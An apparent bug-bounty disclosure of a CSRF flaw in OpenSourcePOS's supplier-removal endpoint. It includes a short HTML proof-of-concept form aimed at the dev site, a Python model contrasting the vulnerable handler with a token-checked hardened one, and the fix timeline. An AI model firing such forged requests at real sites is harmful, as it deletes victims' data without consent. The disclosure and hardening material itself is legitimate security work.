Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021


Description

Attacker able to delete supplier with CSRF attack

Proof of Concept

//PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://dev.opensourcepos.org/receivings/remove_supplier">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
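As an added illustration (not code from this report or from OpenSourcePOS), the following constructed Python model shows a remove_supplier handler in the shape the report describes, next to a hardened version that refuses GET, rejects a foreign Origin where the browser sends one, and requires a per-session synchronizer token; the request dictionaries, the supplier_id parameter and the attacker origin are assumptions.

```python
import hmac
import secrets

# Constructed model of the vulnerable and hardened handler; not OpenSourcePOS code.
# A "request" is a dict: method, path, headers, params (query or form), session.

SITE_ORIGIN = "https://dev.opensourcepos.org"  # origin of the PoC's target


def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return it so
    the legitimate form can embed it as a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def remove_supplier_vulnerable(request, suppliers):
    """Pattern the report describes: any GET, authenticated only by the
    browser-attached session cookie, deletes the supplier."""
    suppliers.pop(request["params"].get("supplier_id"), None)
    return 200


def remove_supplier_hardened(request, suppliers):
    """Synchronizer-token pattern plus method and Origin checks."""
    if request["method"] != "POST":
        return 405  # a state change must never ride on a GET navigation
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403  # cross-site POST: browsers attach Origin, so reject early
    expected = request["session"].get("csrf_token")
    supplied = request["params"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403  # token missing or wrong (constant-time compare)
    suppliers.pop(request["params"].get("supplier_id"), None)
    return 200


def forged_request(session):
    """What the PoC form produces: a top-level GET with the victim's session
    cookie attached, no token, and (for a GET navigation) no Origin header."""
    return {"method": "GET", "path": "/receivings/remove_supplier",
            "headers": {}, "params": {"supplier_id": "7"}, "session": session}


def legitimate_request(session):
    """Same-origin POST from the real form, carrying the session's token."""
    return {"method": "POST", "path": "/receivings/remove_supplier",
            "headers": {"Origin": SITE_ORIGIN},
            "params": {"supplier_id": "7", "csrf_token": session["csrf_token"]},
            "session": session}
```

The absent Origin on the forged GET is why the method and token checks, not the Origin check alone, are what stop the PoC.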

We have contacted a member of the opensourcepos team and are waiting to hear back a year ago
jekkos validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit 329f17 a year ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE